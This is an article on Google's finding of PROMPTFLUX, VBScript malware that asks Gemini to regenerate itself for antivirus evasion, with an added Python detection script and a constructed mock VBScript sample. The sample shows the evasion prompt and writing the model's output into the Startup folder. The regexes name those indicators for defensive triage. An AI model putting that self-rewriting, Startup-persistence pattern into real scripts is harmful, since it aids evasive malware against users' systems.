The Google Threat Intelligence Group (GTIG) has identified a new wave of malicious activity in which a large language model is wired directly into the malware's own operation. The most notable discovery, a VBScript sample GTIG calls PROMPTFLUX, is the first observed instance of what the group describes as "just-in-time" self-modification: rather than shipping with its final obfuscated form, the malware calls an LLM at run time to regenerate its own code.
Unlike a conventional packer or obfuscator, which applies a fixed transformation once before the file is distributed, PROMPTFLUX calls the Gemini API while it runs and asks the model to rewrite its VBScript source. The intent is that every regenerated copy differs in structure and content, so a static signature written for one copy does not match the next. The caveat a defender should keep in mind is that this trades one stable artifact for another: the API endpoint, the model name, the embedded key and the outbound HTTPS request to Google's API from a script host are themselves consistent indicators, and the regenerated code still has to perform the same actions on the host.
Researchers found that PROMPTFLUX targets the "gemini-1.5-flash-latest" model to obtain updated logic and executable components. The script authenticates with API keys hard-coded into its own source and sends Gemini a prompt requesting a new VBScript variant written specifically to evade antivirus detection. A hard-coded key is also a single point of failure for the operator: once the key is revoked, the regeneration loop stops working, which is why extracting and reporting such keys is worthwhile during analysis.
A component named "Thinking Robot" drives this loop. It periodically queries the Gemini API, writes the freshly generated VBScript to the Windows Startup folder, and thereby keeps a copy running on the compromised system across reboots. The persistence primitive itself is unchanged from ordinary VBScript malware, so existing detections for script files dropped into the Startup folder still apply regardless of how the script body was produced.
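The indicator combination described above (a Gemini API call, a key hard-coded in the script, a request for new VBScript, and a write to the Startup folder) lends itself to a simple static triage check. The following is an added example written for this article; it is not GTIG's tooling and not code from the malware. The regexes, weights and threshold are assumptions chosen for the example, and the two VBScript samples are constructed inputs, not real malware. Google API keys are 39 characters beginning with "AIza", which is what the key pattern relies on.

```python
"""Static triage of VBScript for PROMPTFLUX-style indicators (added example)."""
import re

# (name, pattern, weight). Weights and threshold are assumptions for this example.
INDICATORS = [
    ("gemini_endpoint",
     re.compile(r"generativelanguage\.googleapis\.com", re.I), 3),
    ("gemini_model",
     re.compile(r"gemini-1\.5-flash(?:-latest)?", re.I), 2),
    # Google API keys: "AIza" followed by 35 URL-safe characters (39 total).
    ("hardcoded_google_api_key",
     re.compile(r"\bAIza[0-9A-Za-z_-]{35}\b"), 3),
    # The prompt asks the model for VBScript; a literal mention is a weak hint.
    ("asks_for_vbscript",
     re.compile(r"vbscript", re.I), 1),
    # Startup-folder persistence via WScript.Shell or a literal path.
    ("startup_folder_persistence",
     re.compile(r'SpecialFolders\(\s*"Startup"\s*\)|\\Programs\\Startup|shell:startup', re.I), 2),
    # Running model output directly would be the next step; flag it if present.
    ("dynamic_script_execution",
     re.compile(r"\b(?:Execute|ExecuteGlobal)\b", re.I), 2),
]
WEIGHTS = {name: weight for name, _, weight in INDICATORS}
KEY_RE = next(p for n, p, _ in INDICATORS if n == "hardcoded_google_api_key")
SUSPICIOUS_THRESHOLD = 6  # assumption: endpoint + key, or key + model + persistence


def scan_script(text):
    """Return {indicator_name: match_count} for every indicator that fires."""
    hits = {}
    for name, pattern, _ in INDICATORS:
        count = len(pattern.findall(text))
        if count:
            hits[name] = count
    return hits


def score(text):
    """Sum the weights of all indicators present in the script."""
    return sum(WEIGHTS[name] for name in scan_script(text))


def verdict(text):
    return "suspicious" if score(text) >= SUSPICIOUS_THRESHOLD else "benign"


def extract_api_keys(text):
    """Literal Google-style API keys, worth reporting for revocation."""
    return sorted(set(KEY_RE.findall(text)))


# Constructed sample mimicking the described behaviour; not real malware code.
SAMPLE_SUSPICIOUS = r'''
' constructed sample for the article
apiKey = "AIzaSyA1b2C3d4E5f6G7h8I9j0K1l2M3n4O5p6Q"
url = "https://generativelanguage.googleapis.com/v1beta/models/gemini-1.5-flash-latest:generateContent?key=" & apiKey
prompt = "Return a new VBScript variant that evades antivirus"
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "POST", url, False
http.Send body
startup = CreateObject("WScript.Shell").SpecialFolders("Startup")
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(startup & "\update.vbs", True)
f.Write http.responseText
'''

# Constructed benign admin script for comparison.
SAMPLE_BENIGN = r'''
' constructed sample: rotate old log files
Set fso = CreateObject("Scripting.FileSystemObject")
For Each f In fso.GetFolder("C:\Logs").Files
  If DateDiff("d", f.DateLastModified, Now) > 30 Then f.Delete
Next
'''

if __name__ == "__main__":
    for label, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, verdict(sample), score(sample), scan_script(sample))
    print("keys to report:", extract_api_keys(SAMPLE_SUSPICIOUS))
```

The point of the weighting is that no single string is damning on its own (a legitimate automation script may call the Gemini API), but a script that carries a literal key, names the model, asks for VBScript and drops output into the Startup folder is worth pulling for manual review. Running the scan over a directory of .vbs files collected from endpoints is a straightforward extension.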
The samples GTIG analysed are early-stage, but the design is a clear step toward malware that outsources its own evolution to a large language model: PROMPTFLUX uses Gemini to regenerate its code and pursue detection evasion without operator involvement, and that pattern, rather than this particular script, is what marks a new phase in malware design.